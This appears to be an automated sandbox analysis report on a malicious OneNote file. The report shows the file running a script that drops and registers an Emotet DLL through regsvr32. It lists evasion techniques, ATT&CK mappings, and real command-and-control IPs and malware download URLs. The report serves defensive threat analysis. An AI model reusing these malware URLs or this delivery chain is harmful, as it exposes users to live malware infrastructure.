              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2C05812_2_02B2C058
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1784012_2_02B17840
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2C44C12_2_02B2C44C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B195BC12_2_02B195BC
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2BDA012_2_02B2BDA0
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2D5F012_2_02B2D5F0
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B215C812_2_02B215C8
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2B13012_2_02B2B130
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1613812_2_02B16138
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B24D2012_2_02B24D20
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2192412_2_02B21924
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2AD2812_2_02B2AD28
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B3991012_2_02B39910
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2751812_2_02B27518
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B3850012_2_02B38500
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B3210012_2_02B32100
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2610C12_2_02B2610C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B34D6412_2_02B34D64
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,11_2_0000000180010C10
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert,11_2_0000000180010AC0
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,11_2_0000000180010DB0
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
              Source: Insight_Medical_Publishing_3.oneReversingLabs: Detection: 30%
              Source: Insight_Medical_Publishing_3.oneVirustotal: Detection: 41%
              Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing_3.one
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll"
              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll"
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll"Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\Documents\{FEEE3FA4-F7B3-4CCE-AC94-72B79C0B1135}Jump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Local\Temp\{1A5C047D-3D28-4AA6-A11A-87D0AFF6CFBA} - OProcSessId.datJump to behavior
              Source: classification engineClassification label: mal100.troj.expl.evad.winONE@9/11@1/49
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile read: C:\Program Files (x86)\desktop.iniJump to behavior
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F48BC8 Process32NextW,Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,11_2_00F48BC8
              Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
              Source: Binary string: ain.pdb source: OneNote15WatsonLog.etl.0.dr
              Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdbain.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: OneNote15WatsonLog.etl.0.dr
              Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdb source: OneNote15WatsonLog.etl.0.dr
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0000000180005C69 push rdi; ret 11_2_0000000180005C72
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00000001800056DD push rdi; ret 11_2_00000001800056E4
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4A0FC push ebp; iretd 11_2_00F4A0FD
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F580D7 push ebp; retf 11_2_00F580D8
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F46CDE push esi; iretd 11_2_00F46CDF
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F46C9F pushad ; ret 11_2_00F46CAA
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4A1D2 push ebp; iretd 11_2_00F4A1D3
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F57987 push ebp; iretd 11_2_00F5798F
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F58157 push ebp; retf 11_2_00F58158
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F49D51 push ebp; retf 11_2_00F49D5A
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F57D4E push ebp; iretd 11_2_00F57D4F
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F57D3C push ebp; retf 11_2_00F57D3D
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F57D25 push 4D8BFFFFh; retf 11_2_00F57D2A
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F57EAF push 458BCC5Ah; retf 11_2_00F57EBC
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F49E8B push eax; retf 11_2_00F49E8E
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4A26E push ebp; ret 11_2_00F4A26F
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5C731 push esi; iretd 11_2_00F5C732
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2C731 push esi; iretd 12_2_02B2C732
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B16C9F pushad ; ret 12_2_02B16CAA
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B16CDE push esi; iretd 12_2_02B16CDF
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B36D34 push edi; ret 12_2_02B36D36
              Source: rad38C2A.tmp.dll.9.drStatic PE information: section name: _RDATA
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll
              Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dllJump to dropped file
              Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll (copy)Jump to dropped file
              Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll (copy)Jump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Hides that the sample has been downloaded from the Internet (zone.identifier)
              Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exe TID: 4956Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\regsvr32.exe TID: 1540Thread sleep time: -270000s >= -30000sJump to behavior
              Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.0 %
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0000000180008D28 FindFirstFileExW,11_2_0000000180008D28
              Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: regsvr32.exe, 0000000C.00000003.451113819.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.420606431.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0P/
              Source: wscript.exe, 00000009.00000002.353992148.00000000053FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: wscript.exe, 00000009.00000003.349954279.0000000005423000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351723775.0000000005423000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.354073376.0000000005423000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.424429920.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451389170.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480911858.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.420606431.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451649748.00000000012F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wscript.exe, 00000009.00000002.353992148.00000000053FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: regsvr32.exe, 0000000C.00000003.424429920.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451389170.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480911858.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.420606431.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451649748.00000000012F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0000000180001C48
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_000000018000A878 GetProcessHeap,11_2_000000018000A878
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,11_2_0000000180010C10
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0000000180001C48
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00000001800082EC
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00000001800017DC

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 203.26.41.131 443Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeDomain query: penshorn.org
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.89.202.34 443Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 160.16.142.56 8080Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00000001800070A0 cpuid 11_2_00000001800070A0
              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_0000000180001D98

              Stealing of Sensitive Information

              barindex
              Yara detected Malicious OneNote
              Source: Yara matchFile source: Insight_Medical_Publishing_3.one, type: SAMPLE
              Yara detected Emotet
              Source: Yara matchFile source: 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 12.2.regsvr32.exe.1220000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.regsvr32.exe.1220000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.regsvr32.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.regsvr32.exe.f10000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000002.580204342.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.579427861.0000000001220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.334703858.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected Malicious OneNote
              Source: Yara matchFile source: Insight_Medical_Publishing_3.one, type: SAMPLE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Scripting              		1
              DLL Side-Loading              		111
              Process Injection              		21
              Masquerading              		OS Credential Dumping1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium11
              Encrypted Channel              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Exploitation for Client Execution              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Virtualization/Sandbox Evasion              		LSASS Memory121
              Security Software Discovery              		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
              Non-Standard Port              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)111
              Process Injection              		Security Account Manager1
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
              Ingress Tool Transfer              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
              Scripting              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput CaptureScheduled Transfer3
              Non-Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Hidden Files and Directories              		LSA Secrets1
              Remote System Discovery              		SSHKeyloggingData Transfer Size Limits114
              Application Layer Protocol              		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Obfuscated Files or Information              		Cached Domain Credentials2
              File and Directory Discovery              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items1
              Regsvr32              		DCSync25
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 828495 Sample: Insight_Medical_Publishing_3.one Startdate: 17/03/2023 Architecture: WINDOWS Score: 100 33 129.232.188.93 xneeloZA South Africa 2->33 35 45.235.8.30 WIKINETTELECOMUNICACOESBR Brazil 2->35 37 36 other IPs or domains 2->37 47 Snort IDS alert for network traffic 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Antivirus detection for URL or domain 2->51 53 7 other signatures 2->53 10 ONENOTE.EXE 21 23 2->10         started        signatures3 process4 process5 12 wscript.exe 2 10->12         started        dnsIp6 45 penshorn.org 203.26.41.131, 443, 49683 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 12->45 29 C:\Users\user\AppData\...\rad38C2A.tmp.dll, PE32+ 12->29 dropped 31 C:\Users\user\AppData\Local\Temp\click.wsf, ASCII 12->31 dropped 59 System process connects to network (likely due to code injection or exploit) 12->59 17 regsvr32.exe 12->17         started        file7 signatures8 process9 process10 19 regsvr32.exe 2 17->19         started        file11 27 C:\Windows\...behaviorgraphJcmgWEWTZrc.dll (copy), PE32+ 19->27 dropped 55 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->55 23 regsvr32.exe 19->23         started        signatures12 process13 dnsIp14 39 160.16.142.56, 8080 SAKURA-BSAKURAInternetIncJP Japan 23->39 41 91.121.146.47, 49684, 8080 OVHFR France 23->41 43 8 other IPs or domains 23->43 57 System process connects to network (likely due to code injection or exploit) 23->57 signatures15

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Insight_Medical_Publishing_3.one31%ReversingLabsScript-WScript.Trojan.OneNote
              Insight_Medical_Publishing_3.one41%VirustotalBrowse

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll58%ReversingLabsWin64.Trojan.Emotet
              C:\Windows\System32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll (copy)58%ReversingLabsWin64.Trojan.Emotet

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              12.2.regsvr32.exe.1220000.0.unpack100%AviraHEUR/AGEN.1215476Download File
              11.2.regsvr32.exe.f10000.0.unpack100%AviraHEUR/AGEN.1215476Download File

              Domains

              SourceDetectionScannerLabelLink
              penshorn.org11%VirustotalBrowse
              windowsupdatebg.s.llnwi.net0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://182.162.143.56/0%URL Reputationsafe
              https://182.162.143.56/0%URL Reputationsafe
              https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/#100%Avira URL Cloudmalware
              https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/eB100%Avira URL Cloudmalware
              https://182.162.143.56/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/100%Avira URL Cloudmalware
              https://159.89.202.34/19%VirustotalBrowse
              http://softwareulike.com/cWIYxWMPkK/16%VirustotalBrowse
              https://91.121.146.47:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/100%Avira URL Cloudmalware
              https://182.162.143.56/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/x100%Avira URL Cloudmalware
              https://pe2.162.143.56/0%Avira URL Cloudsafe
              http://softwareulike.com/cWIYxWMPkK/100%Avira URL Cloudmalware
              https://159.89.202.34/100%Avira URL Cloudmalware
              https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/100%Avira URL Cloudmalware
              https://91.121.146.47:8080/100%Avira URL Cloudmalware
              https://187.172.199.165:8080/0%Avira URL Cloudsafe
              https://160.16.142.56:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/0%Avira URL Cloudsafe
              https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/100%Avira URL Cloudmalware
              https://160.16.142.56:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl//6(0%Avira URL Cloudsafe
              https://www.gomespontes.com.br/logs/pd/vM100%Avira URL Cloudmalware
              https://167.172.199.165:8080/100%Avira URL Cloudmalware
              https://167.172.199.165:8080/l100%Avira URL Cloudmalware
              https://159.89.202.34/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/h100%Avira URL Cloudmalware
              https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/IT100%Avira URL Cloudmalware
              https://91.121.146.47:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/000100%Avira URL Cloudmalware
              https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dll100%Avira URL Cloudmalware
              https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/n100%Avira URL Cloudmalware
              https://portalevolucao.com/GerarBoleto/fLIOoFb0%Avira URL Cloudsafe
              http://ozmeydan.com/cekici/9/100%Avira URL Cloudmalware
              https://penshorn.org/0%Avira URL Cloudsafe
              https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM100%Avira URL Cloudmalware
              https://www.gomespontes.com.br/logs/pd/100%Avira URL Cloudmalware
              https://penshorn.org/admin/Ses8712iGR8du/tM100%Avira URL Cloudmalware
              https://167.172.199.165:8080/mwollpl/100%Avira URL Cloudmalware
              https://portalevolucao.com/GerarBoleto/fLIOoFbFs1j0%Avira URL Cloudsafe
              https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM100%Avira URL Cloudmalware
              https://penshorn.org/admin/Ses8712iGR8du/100%Avira URL Cloudmalware
              http://softwareulike.com/cWIYxWMPkK/7100%Avira URL Cloudmalware
              https://66.228.32.31:7080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/100%Avira URL Cloudmalware
              http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/100%Avira URL Cloudmalware
              http://softwareulike.com/cWIYxWMPkK/yM100%Avira URL Cloudmalware
              https://182.162.143.56/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/l/100%Avira URL Cloudmalware
              https://167.172.199.165:8080/8100%Avira URL Cloudmalware
              https://159.89.202.34/I100%Avira URL Cloudmalware
              https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllNZr100%Avira URL Cloudmalware
              http://softwareulike.com/cWIYxW0%Avira URL Cloudsafe
              http://ozmeydan.com/cekici/9/xM100%Avira URL Cloudmalware
              https://187.63.160.88:80/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/01100%Avira URL Cloudmalware
              https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/100%Avira URL Cloudmalware
              http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM100%Avira URL Cloudmalware
              https://66.228.32.31:7080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/_100%Avira URL Cloudmalware
              https://159.89.202.34/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/100%Avira URL Cloudmalware
              https://160.16.142.56:8080/0%Avira URL Cloudsafe
              https://164.90.222.65/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/100%Avira URL Cloudmalware
              https://163.44.196.120:8080/3100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              penshorn.org
              		203.26.41.131
              		truetrueunknown
              windowsupdatebg.s.llnwi.net
              		178.79.242.128
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://182.162.143.56/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/true
              • Avira URL Cloud: malware
              		unknown
              https://penshorn.org/admin/Ses8712iGR8du/true
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
